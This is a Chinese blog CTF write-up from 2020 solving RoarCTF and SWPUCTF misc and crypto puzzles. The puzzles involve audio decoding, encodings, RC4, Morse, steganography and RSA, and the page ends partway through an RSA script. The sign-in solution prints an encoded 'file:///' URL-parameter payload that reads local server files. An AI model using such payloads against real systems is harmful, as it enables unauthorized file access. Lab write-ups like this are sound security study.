      if (window.innerWidth < 770) {
        return null;
      }

      if (e.key === 'Escape') {
        searchResult ? searchResult.setAttribute('data-display', 'none') : null;
        summaryContainer ? summaryContainer.setAttribute('data-display', 'block') : null;
      }

      var items = document.querySelectorAll('#search-menu .dropdown-item');
      var keyCode = e.which || e.keyCode;

      if (!items || !items.length) {
        return null;
      }
      
      if (e.key === 'ArrowDown' || keyCode === 40) {
        if (activeIndex === null) {
          activeIndex = 0;
          items[activeIndex].classList.remove('is-active');
        } else {
          items[activeIndex].classList.remove('is-active');
          activeIndex = activeIndex === items.length - 1 ? 0 : activeIndex + 1;
        }
        items[activeIndex].classList.add('is-active');

        let overflowedPixel = items[activeIndex].offsetTop + items[activeIndex].clientHeight - searchContainerMaxHeight;
        if (overflowedPixel > 0) {
          document.querySelector(".search-content").scrollTop += items[activeIndex].getBoundingClientRect().height;
        } else if (activeIndex === 0) {
          document.querySelector(".search-content").scrollTop = 0;
        }
      } else if (e.key === 'ArrowUp' || keyCode === 38) {
        if (activeIndex === null) {
          activeIndex = items.length - 1;
          items[activeIndex].classList.remove('is-active');
        } else {
          items[activeIndex].classList.remove('is-active');
          activeIndex = activeIndex === 0 ? items.length - 1 : activeIndex - 1;
        }
        items[activeIndex].classList.add('is-active');
        
        let overflowedPixel = items[activeIndex].offsetTop + items[activeIndex].clientHeight - searchContainerMaxHeight;
        if (overflowedPixel < 0) {
          document.querySelector(".search-content").scrollTop -= items[activeIndex].getBoundingClientRect().height;
        } else {
          document.querySelector(".search-content").scrollTop = overflowedPixel + items[activeIndex].getBoundingClientRect().height;
        }
      } else if (e.key === 'Enter' || keyCode === 13) {
        if (items[activeIndex] && items[activeIndex].getAttribute('href')) {
          location.href = items[activeIndex].getAttribute('href');
        }
      } else if (e.key === 'Escape' || keyCode === 27) {
        e.target.value = null;
        if (searchResults) {
          searchResults.classList.remove('is-active');
        }
      }
    }) : null;

    searchMobile ? 
    searchMobile.addEventListener('input', function(e) {
      if (!e.target.value) {
        let wrap = document.getElementById('search-mobile-results');
        while (wrap.firstChild) {
          wrap.removeChild(wrap.firstChild);
        }
        return null;
      }

      searchText = e.target.value;
      var results = fuse.search(e.target.value);
      renderSearchResultsMobile(searchText, results);
      if (enableSearchHighlight) {
        renderSearchHighlightResultsMobile(searchText, results);
      } else {
        renderSearchResultsMobile(searchText, results);
      }
    }) : null;
  


  
    var mobileSearchInputElem = document.querySelector('#search-mobile');
    var mobileSearchClassElem = document.querySelector('.mobile-search');
    var mobileSearchBtnElems = document.querySelectorAll('.navbar-search');
    var mobileSearchCloseBtnElem = document.querySelector('#search-mobile-close');
    var mobileSearchContainer = document.querySelector('#search-mobile-container');
    var mobileSearchResultsElem = document.querySelector('#search-mobile-results');
    var htmlElem = document.querySelector('html');

    if (mobileSearchClassElem) {
      mobileSearchClassElem.style.display = 'none';
    }

    mobileSearchBtnElems ? 
    mobileSearchBtnElems.forEach(function (elem, idx) {
      elem.addEventListener('click', function () {
        if (mobileSearchContainer) {
          mobileSearchContainer.style.display = 'block';
        }

        if (mobileSearchInputElem) {
          mobileSearchInputElem.focus();
        }

        if (htmlElem) {
          htmlElem.style.overflowY = 'hidden';
        }
      });
    }) : null;

    mobileSearchCloseBtnElem ? 
    mobileSearchCloseBtnElem.addEventListener('click', function() {
      if (mobileSearchContainer) {
        mobileSearchContainer.style.display = 'none';
      }

      if (mobileSearchInputElem) {
        mobileSearchInputElem.value = '';
      }
      
      if (mobileSearchResultsElem) {
        while (mobileSearchResultsElem.firstChild) {
          mobileSearchResultsElem.removeChild(mobileSearchResultsElem.firstChild);
        }
      }

      if (htmlElem) {
        htmlElem.style.overflowY = 'visible';
      }
    }) : null;

    mobileSearchInputElem ?
    mobileSearchInputElem.addEventListener('keydown', function(e) {
      var keyCode = e.which || e.keyCode;
      if (e.key === 'Escape' || keyCode === 27) {
        if (mobileSearchContainer) {
          mobileSearchContainer.style.display = 'none';
        }
        
        if (mobileSearchInputElem) {
          mobileSearchInputElem.value = '';
        }

        if (mobileSearchResultsElem) {
          while (mobileSearchResultsElem.firstChild) {
            mobileSearchResultsElem.removeChild(mobileSearchResultsElem.firstChild);
          }
        }
        if (htmlElem) {
          htmlElem.style.overflowY = 'visible';
        }
      }
    }) : null;
  


  
    function renderSearchResultsMain(searchText, results) {
      var searchBody = document.querySelector('.search-result__body');
      var originUl = searchBody.querySelector('ul');
      var ul = document.createElement('ul');
      
      if (!searchText) {
        searchResult ? searchResult.setAttribute('data-display', 'none') : null;
        summaryContainer ? summaryContainer.setAttribute('data-display', 'block') : null;
      } else if (results) {
        if (results && results.length) {
          results.forEach(function (result) {
            makeLi(ul, result);
          });

          searchResult ? searchResult.setAttribute('data-display', 'block') : null;
          summaryContainer ? summaryContainer.setAttribute('data-display', 'none') : null;
        }
      }

      originUl.parentNode.replaceChild(ul, originUl);
    }

    function renderSearchHighlightResultsMain(searchText, results) {
      var searchBody = document.querySelector('.search-result__body');
      var originUl = searchBody.querySelector('ul');
      var ul = document.createElement('ul');

      if (!searchText) {
        searchResult ? searchResult.setAttribute('data-display', 'none') : null;
        summaryContainer ? summaryContainer.setAttribute('data-display', 'block') : null;
      } else if (results) {
        if (results && results.length) {
          results.forEach(function (result) {
            makeHighlightLi(ul, result);
          });

          searchResult ? searchResult.setAttribute('data-display', 'block') : null;
          summaryContainer ? summaryContainer.setAttribute('data-display', 'none') : null;
        }
      }

      originUl.parentNode.replaceChild(ul, originUl);
    }
  
  });
</script>
    
    


<link rel="stylesheet" href="/css/main.min.css">


    
<meta name="description" content="" />


<meta name="keywords" content="CTF,WP">

<meta name="created" content="2020-12-06T00:00:00&#43;0000">
<meta name="modified" content="2020-12-06T00:00:00&#43;0000">
<meta property="article:published_time" content="2020-12-06T00:00:00&#43;0000">

<meta name="author" content="ruokeqx">


<meta property="og:site_name" content="ruokeqx&#39;s blog">
<meta property="og:title" content="2020CTF WP">
<meta property="og:url" content="https://ruokeqx.gitee.io/posts/2020ctfwp/">
<meta property="og:type" content="article">
<meta property="og:description" content="">

<meta name="generator" content="Hugo 0.100.2" />
<meta name="msapplication-TileColor" content="#fff">

<meta name="theme-color" content="#fff">

<meta name="msapplication-navbutton-color" content="#fff">

<meta name="apple-mobile-web-app-status-bar-style" content="#fff">

<link rel="canonical" href="https://ruokeqx.gitee.io/posts/2020ctfwp/">

<link rel="manifest" href="/manifest.json">

  
  <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">
  <link rel="icon" href="/favicon.png" sizes="any" type="image/png" />
  


    <script type="application/ld+json">
  {
    "@context": "https://schema.org",
    "@type": "WebPage",
    "headline": "2020CTF WP",
    "datePublished": "2020-12-06T00:00:00Z",
    "dateModified": "2020-12-06T00:00:00Z",
    "url" : "https://ruokeqx.gitee.io/posts/2020ctfwp/",
    "description": "2020RoarCTF Misc Writeup 签到 签到比后面难系列.jpg 1 ?url=file:///%25%36%36%25%36%63%25%36%31%25%36%37 Hi_433MHz 是铁憨憨没错，不看软件提示，建议去爬。 直接拖到audacity提示如下。 按照他说的导入文件，明显看到",
    "keywords": ["CTF","WP"],
    "mainEntityOfPage": {
      "@type": "WebPage",
      "@id": "https://ruokeqx.gitee.io"
    },
    "publisher": {
      "@type": "Organization",
      "name": "ruokeqx's blog",
      "url": "https://ruokeqx.gitee.io"
    }
  }
</script>

    
  
  







  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

    
</head>

<body id="root" class="theme__dark">
    <script>
        var localTheme = localStorage.getItem('theme');
        if (localTheme) {
            document.getElementById('root').className = 'theme__' + localTheme;
        }
    </script>
    <div id="container">
        





        <div class="wrapper" data-type="posts" data-kind="page">
            <nav class="navbar scrolling" role="navigation" aria-label="main navigation" data-dir="ltr">
  <div class="navbar__brand">
    
    <a href="/" title="Home" rel="home" class="navbar__logo-link">
      <img src="/logo.png" alt="Home" class="navbar__logo">
    </a>
    
    
      <a href="/" title="Home" rel="home" class="navbar__title-link">
        <h6 class="navbar__title">ruokeqx</h6>
      </a>
    
  </div>

  
<div class="theme theme-mobile" data-ani="true">
  <div class="dropdown">
    <button class="dropdown-trigger navbar__slide-down" aria-label="Select Theme Button" style="" data-ani="true">
      <svg xmlns="http://www.w3.org/2000/svg" width="22" height="22" viewBox="0 0 24 24"><path fill="none" d="M24 0H0v24h24V0z"/><path fill="currentColor" d="M6.34 7.93c-3.12 3.12-3.12 8.19 0 11.31C7.9 20.8 9.95 21.58 12 21.58s4.1-.78 5.66-2.34c3.12-3.12 3.12-8.19 0-11.31l-4.95-4.95c-.39-.39-1.02-.39-1.41 0L6.34 7.93zM12 19.59c-1.6 0-3.11-.62-4.24-1.76C6.62 16.69 6 15.19 6 13.59s.62-3.11 1.76-4.24L12 5.1v14.49z"/></svg>      
    </button>
    <div class="dropdown-content select-theme">
      
        
        <a href="#" class="dropdown-item select-theme__item is-active">
          dark
        </a>
        
        <a href="#" class="dropdown-item select-theme__item ">
          light
        </a>
        
        <a href="#" class="dropdown-item select-theme__item ">
          hacker
        </a>
        
        <a href="#" class="dropdown-item select-theme__item ">
          solarized
        </a>
        
        <a href="#" class="dropdown-item select-theme__item ">
          kimbie
        </a>
        
      
    </div>
  </div>
</div>


<div class="mobile-search__btn navbar-search" data-ani="true">
  <svg xmlns="http://www.w3.org/2000/svg" width="22" height="22" fill="currentColor" viewBox="0 0 24 24"><path fill="none" d="M0 0h24v24H0V0z"/><path d="M15.5 14h-.79l-.28-.27c1.2-1.4 1.82-3.31 1.48-5.34-.47-2.78-2.79-5-5.59-5.34-4.23-.52-7.79 3.04-7.27 7.27.34 2.8 2.56 5.12 5.34 5.59 2.03.34 3.94-.28 5.34-1.48l.27.28v.79l4.25 4.25c.41.41 1.08.41 1.49 0 .41-.41.41-1.08 0-1.49L15.5 14zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z"/></svg>
</div>

<div id="search-mobile-container" class="mobile-search hide" data-dir="ltr">
  <div class="mobile-search__top">
    <input id="search-mobile" type="text" aria-label="Mobile Search" placeholder="Search" class="mobile-search__top--input"/>
    <div id="search-mobile-close" class="mobile-search__top--icon">
      <svg xmlns="http://www.w3.org/2000/svg" width="22" height="22" viewBox="0 0 24 24"><path opacity=".87" fill="none" d="M0 0h24v24H0V0z"/><path fill="currentColor" d="M12 2C6.47 2 2 6.47 2 12s4.47 10 10 10 10-4.47 10-10S17.53 2 12 2zm0 18c-4.41 0-8-3.59-8-8s3.59-8 8-8 8 3.59 8 8-3.59 8-8 8zm3.59-13L12 10.59 8.41 7 7 8.41 10.59 12 7 15.59 8.41 17 12 13.41 15.59 17 17 15.59 13.41 12 17 8.41z"/></svg>
    </div>
  </div>
  <div id="search-mobile-results" class="mobile-search__body">
    
  </div>
</div>


<a role="button" class="navbar__burger" aria-label="menu" aria-expanded="false"
  data-ani="true">
  <span aria-hidden="true"></span>
  <span aria-hidden="true"></span>
  <span aria-hidden="true"></span>
</a>
<div class="navbarm__collapse" data-open="false">
  <ul dir="ltr">
    
    
      
      
      
      

      
        <li class="navbarm__menu--item active">
          <a href="/posts">Posts</a>
        </li>
      
      
    
      
      
      
      

      
        <li class="navbarm__menu--item ">
          <a href="/archive">Archive</a>
        </li>
      
      
    
      
      
      
      

      
        <li class="navbarm__menu--item ">
          <a href="/about">About</a>
        </li>
      
      
    

    
      <li class="navbarm__menu--item ">
        <a href="/tags" class="navbarm__menu--term" data-index="0">
          Tags
        </a>
      </li>
    
      <li class="navbarm__menu--item ">
        <a href="/categories" class="navbarm__menu--term" data-index="1">
          Categories
        </a>
      </li>
    
      <li class="navbarm__menu--item ">
        <a href="/series" class="navbarm__menu--term" data-index="2">
          Series
        </a>
      </li>
    
  </ul>
</div>
  <div class="navbar__menu">
  
  
  
<div class="theme" data-ani="true">
  <div class="dropdown">
    <button class="dropdown-trigger navbar__slide-down" aria-label="Select Theme Button" data-ani="true">
      <svg xmlns="http://www.w3.org/2000/svg" width="22" height="22" viewBox="0 0 24 24"><path fill="none" d="M24 0H0v24h24V0z"/><path fill="currentColor" d="M6.34 7.93c-3.12 3.12-3.12 8.19 0 11.31C7.9 20.8 9.95 21.58 12 21.58s4.1-.78 5.66-2.34c3.12-3.12 3.12-8.19 0-11.31l-4.95-4.95c-.39-.39-1.02-.39-1.41 0L6.34 7.93zM12 19.59c-1.6 0-3.11-.62-4.24-1.76C6.62 16.69 6 15.19 6 13.59s.62-3.11 1.76-4.24L12 5.1v14.49z"/></svg>      
    </button>
    <div class="dropdown-content select-theme">
      
        
        <a href="#" class="dropdown-item select-theme__item is-active">
          dark
        </a>
        
        <a href="#" class="dropdown-item select-theme__item ">
          light
        </a>
        
        <a href="#" class="dropdown-item select-theme__item ">
          hacker
        </a>
        
        <a href="#" class="dropdown-item select-theme__item ">
          solarized
        </a>
        
        <a href="#" class="dropdown-item select-theme__item ">
          kimbie
        </a>
        
      
    </div>
  </div>
</div>

  
  
  
  
  
  
  
  <a href="/posts" class="navbar__menu-item navbar__slide-down active" dir="ltr" data-ani="true">Posts</a>
  
  
  
  
  
  
  
  <a href="/archive" class="navbar__menu-item navbar__slide-down " dir="ltr" data-ani="true">Archive</a>
  
  
  
  
  
  
  
  <a href="/about" class="navbar__menu-item navbar__slide-down " dir="ltr" data-ani="true">About</a>
  
  
</div>
</nav>
            
            

<main class="single__main main-main">
  
    <nav class="breadcrumb hide" aria-label="breadcrumbs">
  <script>document.querySelector('.breadcrumb').classList.remove('hide')</script>
  <ol>
    
  
  
  
  
  
  <li >
    
      <a href="https://ruokeqx.gitee.io/" class="capitalize">ruokeqx&#39;s blog</a>
    
  </li>
  
  
  <li >
    
      <a href="https://ruokeqx.gitee.io/posts/" class="capitalize">Posts</a>
    
  </li>
  
  
  <li  class="is-active" >
    
      <span>2020CTF WP</span>
    
  </li>
  
  </ol>
  
</nav>
  
  
  <div class="single ">
    <div class="single__nojs">This page looks best with JavaScript enabled</div>
    <script>document.querySelector('.single').classList.remove('hide'); document.querySelector('.single__nojs').classList.add('hide');</script>
    <h2 class="single__title" data-ani="true">2020CTF WP</h2>
    <h3 class="single__subtitle"></h3>
    <div class="single__meta">
      
<div class="single__infos">
  <time class="single__info" title="Written At">📅&nbsp;Dec 6, 2020 </time>
  
  &nbsp;&middot;&nbsp; <span class="single__info" title="Reading Time"> ☕&nbsp;15&nbsp;min read </span>
  
  <span class="single__info">
     &middot; 👀<span id="busuanzi_value_page_pv">...</span> views
  </span>
</div>

      
<ul class="single__tags caption">
  
  🏷️
  

  <li><a href="https://ruokeqx.gitee.io/tags/ctf/" class="single__tag" title="CTF">#CTF</a></li>

  <li><a href="https://ruokeqx.gitee.io/tags/wp/" class="single__tag" title="WP">#WP</a></li>

</ul>

    </div>
    <article class="single__contents" data-dir="ltr" data-ani="true">
      
      <h2 id="2020roarctf-misc-writeup">2020RoarCTF Misc Writeup</h2>
<h3 id="签到">签到</h3>
<p>签到比后面难系列.jpg</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">?url<span class="o">=</span>file:///%25%36%36%25%36%63%25%36%31%25%36%37
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="hi_433mhz">Hi_433MHz</h3>
<p>是铁憨憨没错，不看软件提示，建议去爬。</p>
<p>直接拖到audacity提示如下。</p>
<p><img src="https://img-blog.csdnimg.cn/20201206215702902.png" alt="" /></p>
<p>按照他说的导入文件，明显看到长短，一个九位不是摩斯，八位是二进制，最后一位应该是奇偶校验。</p>
<p><img src="https://img-blog.csdnimg.cn/20201206215858563.png" alt="" /></p>
<p>于是手撸得到</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span><span class="lnt">24
</span><span class="lnt">25
</span><span class="lnt">26
</span><span class="lnt">27
</span><span class="lnt">28
</span><span class="lnt">29
</span><span class="lnt">30
</span><span class="lnt">31
</span><span class="lnt">32
</span><span class="lnt">33
</span><span class="lnt">34
</span><span class="lnt">35
</span><span class="lnt">36
</span><span class="lnt">37
</span><span class="lnt">38
</span><span class="lnt">39
</span><span class="lnt">40
</span><span class="lnt">41
</span><span class="lnt">42
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="m">01100110</span>
</span></span><span class="line"><span class="cl"><span class="m">01101100</span>
</span></span><span class="line"><span class="cl"><span class="m">01100001</span>
</span></span><span class="line"><span class="cl"><span class="m">01100111</span>
</span></span><span class="line"><span class="cl"><span class="m">01111011</span>
</span></span><span class="line"><span class="cl"><span class="m">00110010</span>
</span></span><span class="line"><span class="cl"><span class="m">00110101</span>
</span></span><span class="line"><span class="cl"><span class="m">01100011</span>
</span></span><span class="line"><span class="cl"><span class="m">00110010</span>
</span></span><span class="line"><span class="cl"><span class="m">00110001</span>
</span></span><span class="line"><span class="cl"><span class="m">01100010</span>
</span></span><span class="line"><span class="cl"><span class="m">00110000</span>
</span></span><span class="line"><span class="cl"><span class="m">01100100</span>
</span></span><span class="line"><span class="cl"><span class="m">00101101</span>
</span></span><span class="line"><span class="cl"><span class="m">00110110</span>
</span></span><span class="line"><span class="cl"><span class="m">01100001</span>
</span></span><span class="line"><span class="cl"><span class="m">00110001</span>
</span></span><span class="line"><span class="cl"><span class="m">00110001</span>
</span></span><span class="line"><span class="cl"><span class="m">00101101</span>
</span></span><span class="line"><span class="cl"><span class="m">00110100</span>
</span></span><span class="line"><span class="cl"><span class="m">00110011</span>
</span></span><span class="line"><span class="cl"><span class="m">00110001</span>
</span></span><span class="line"><span class="cl"><span class="m">00110010</span>
</span></span><span class="line"><span class="cl"><span class="m">00101101</span>
</span></span><span class="line"><span class="cl"><span class="m">00111001</span>
</span></span><span class="line"><span class="cl"><span class="m">00110111</span>
</span></span><span class="line"><span class="cl"><span class="m">00110001</span>
</span></span><span class="line"><span class="cl"><span class="m">01100010</span>
</span></span><span class="line"><span class="cl"><span class="m">00101101</span>
</span></span><span class="line"><span class="cl"><span class="m">00110100</span>
</span></span><span class="line"><span class="cl"><span class="m">00110010</span>
</span></span><span class="line"><span class="cl"><span class="m">00111000</span>
</span></span><span class="line"><span class="cl"><span class="m">01100100</span>
</span></span><span class="line"><span class="cl"><span class="m">00110000</span>
</span></span><span class="line"><span class="cl"><span class="m">00110001</span>
</span></span><span class="line"><span class="cl"><span class="m">01100011</span>
</span></span><span class="line"><span class="cl"><span class="m">01100100</span>
</span></span><span class="line"><span class="cl"><span class="m">01100011</span>
</span></span><span class="line"><span class="cl"><span class="m">00110101</span>
</span></span><span class="line"><span class="cl"><span class="m">00110011</span>
</span></span><span class="line"><span class="cl"><span class="m">00110100</span>
</span></span><span class="line"><span class="cl"><span class="m">01111101</span>
</span></span></code></pre></td></tr></table>
</div>
</div><div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">flag<span class="o">{</span>25c21b0d-6a11-4312-971b-428d01cdc534<span class="o">}</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="fm">FM</h3>
<p>软件装了一天，比赛结束后才知道直接听，然而虚拟机声卡被我删了。</p>
<p>我铁憨憨了，四舍五入也算我ak吧球球了。</p>
<p><img src="https://img-blog.csdnimg.cn/20201206215355171.png" alt="" /></p>
<h2 id="2020swpuctf-misccrypto-writeup">2020SWPUCTF Misc&amp;Crypto Writeup</h2>
<p>嘶哄无线电自闭过来随便玩一玩。</p>
<h3 id="misc">Misc</h3>
<h4 id="套娃">套娃</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># RC4data.txt</span>
</span></span><span class="line"><span class="cl">U2FsdGVkX19uI2lzmxYrQ9mc16y7la7qc7VTS8gLaUKa49gzXPclxRXVsRJxWz/p
</span></span></code></pre></td></tr></table>
</div>
</div><div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># 查看hex得到压缩包密码</span>
</span></span><span class="line"><span class="cl">6e4c834d77cba03af41e1562a5bce84e
</span></span><span class="line"><span class="cl"><span class="c1"># 解压得到rc4key</span>
</span></span><span class="line"><span class="cl">ABCDEFGHIJKLMNOPQRSTUVWXYZ
</span></span></code></pre></td></tr></table>
</div>
</div><div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># 在线解密得到flag</span>
</span></span><span class="line"><span class="cl">ef1a73d40977a49b99b871980f355757
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="耗子尾汁">耗子尾汁</h4>
<p>视频中明显有一串东西闪过</p>
<p><img src="https://img-blog.csdnimg.cn/20201206110606699.png" alt="" /></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># base64</span>
</span></span><span class="line"><span class="cl"><span class="nv">c2lnbl9pbg</span><span class="o">==</span>
</span></span><span class="line"><span class="cl"><span class="c1"># 解密得到</span>
</span></span><span class="line"><span class="cl">sign_in
</span></span></code></pre></td></tr></table>
</div>
</div><p>视频尾部有个zip用上面密码解压得到如下</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nv">R1pCVE9OUlhHVTNES05SWkdZWVRNUVJYSEEzVEtOUlVHNFpUT09KWEdFM0RLTlJZRzRaVE9RSlhHRTNEUU5aWkdaQkRNTlpXRzQzVEdOWlpHNDRUTVFaV0lJM1RNTlpXR1k0UT09PT0</span><span class="o">=</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">//The last layer is the single table replacement password
</span></span></code></pre></td></tr></table>
</div>
</div><p>base64，32然后16进制转字符串</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">lvueiakxudsyqehszqhykggsyylkvvi
</span></span><span class="line"><span class="cl">fladybuganeshdiephisuccessfully
</span></span><span class="line"><span class="cl">flagyouhavesignedinsuccessfully
</span></span><span class="line"><span class="cl">xxx_xxxx_xxxxxx_xx_xxxxxxxxxxxx
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="来找我吧">来找我吧</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">key is PPPaAaS
</span></span></code></pre></td></tr></table>
</div>
</div><p>得到<code>findme.mp3</code>和<code>secret.rar</code>,<code>file</code>看一下发现<code>findme.mp3</code>是<code>rar5</code>,改后缀解压得到<code>哈哈哈.png</code>和<code>采茶纪.mp3</code>,<code>secret.rar</code>是真的加密，简单<code>hashcat</code>爆破了一下无解应该是要继续找密码了。</p>
<p>音频开头有类似于拨号音。</p>
<p>末尾有一段摩斯密码</p>
<p><img src="https://img-blog.csdnimg.cn/20201206121719486.png" alt="" /></p>
<p>解密得到<code>D43963E92B012AAB</code> 是一条要钱的md5 穷人不配呜呜呜。hash出来是<code>n1ce_try</code>,解压<code>secret.rar</code>得到一个<code>gif</code>和一个<code>png</code>,<code>gif</code>一帧如下图。</p>
<p><img src="https://img-blog.csdnimg.cn/20201206224405923.png" alt="" /></p>
<p>发现<code>hint.png</code> <code>crc</code>不对，修复后得到<code>hint:Veni,Vidi,Vici</code>直接搜索这个<code>hint</code>发现是凯撒</p>
<p><img src="https://img-blog.csdnimg.cn/20201206224636430.png" alt="" /></p>
<p>凯撒得到<code>flag{sWpu_N1c3_Try}</code></p>
<h4 id="来猜谜吧">来猜谜吧</h4>
<p>得到<code>probelm.png</code>，用<code>zsteg</code>分出一个<code>zip</code>,其尾部有其他内容，删除即可正常解压。得到<code>uuu.pcap</code>是一个鼠标流量，还有一个<code>mi.jpg</code>。</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># 鼠标流量如图</span>
</span></span><span class="line"><span class="cl">AG&lt;SPACE&gt;DX&lt;SPACE&gt;AG&lt;SPACE&gt;DX&lt;SPACE&gt;AG&lt;SPACE&gt;DX
</span></span></code></pre></td></tr></table>
</div>
</div><p>直接对<code>ADFGX</code>表解密得到<code>gogogo</code></p>
<table>
<thead>
<tr>
<th align="left">\</th>
<th align="left">A</th>
<th align="left">D</th>
<th align="left">F</th>
<th align="left">G</th>
<th align="left">X</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">A</td>
<td align="left">p</td>
<td align="left">h</td>
<td align="left">q</td>
<td align="left">g</td>
<td align="left">m</td>
</tr>
<tr>
<td align="left">D</td>
<td align="left">e</td>
<td align="left">a</td>
<td align="left">y</td>
<td align="left">n</td>
<td align="left">o</td>
</tr>
<tr>
<td align="left">F</td>
<td align="left">f</td>
<td align="left">d</td>
<td align="left">x</td>
<td align="left">k</td>
<td align="left">r</td>
</tr>
<tr>
<td align="left">G</td>
<td align="left">c</td>
<td align="left">v</td>
<td align="left">s</td>
<td align="left">z</td>
<td align="left">w</td>
</tr>
<tr>
<td align="left">X</td>
<td align="left">b</td>
<td align="left">u</td>
<td align="left">t</td>
<td align="left">i</td>
<td align="left">l</td>
</tr>
</tbody>
</table>
<p>现在只剩下一个<code>jpg</code>了，带密码的<code>jpg</code>隐写盲猜<code>outguess</code></p>
<p>得到<code>flag{Out9uEsS_1s_V4rY_e4sy}</code></p>
<h3 id="crypto">Crypto</h3>
<h4 id="happy">happy</h4>
<p>签到<code>rsa</code></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">z3</span> <span class="kn">import</span> <span class="o">*</span>
</span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">gmpy2</span>
</span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">Crypto.Util.number</span> <span class="kn">import</span> <span class="o">*</span>
</span></span><span class="line"><span class="cl"><span class="n">c</span><span class="o">=</span><span class="mh">0x7a7e031f14f6b6c3292d11a41161d2491ce8bcdc67ef1baa9e</span>
</span></span><span class="line"><span class="cl"><span class="n">e</span><span class="o">=</span><span class="mh">0x872a335</span>
</span></span><span class="line"><span class="cl"><span class="c1">#q + q*p^3 =1285367317452089980789441829580397855321901891350429414413655782431779727560841427444135440068248152908241981758331600586</span>
</span></span><span class="line"><span class="cl"><span class="c1"># q+q*p**3=</span>
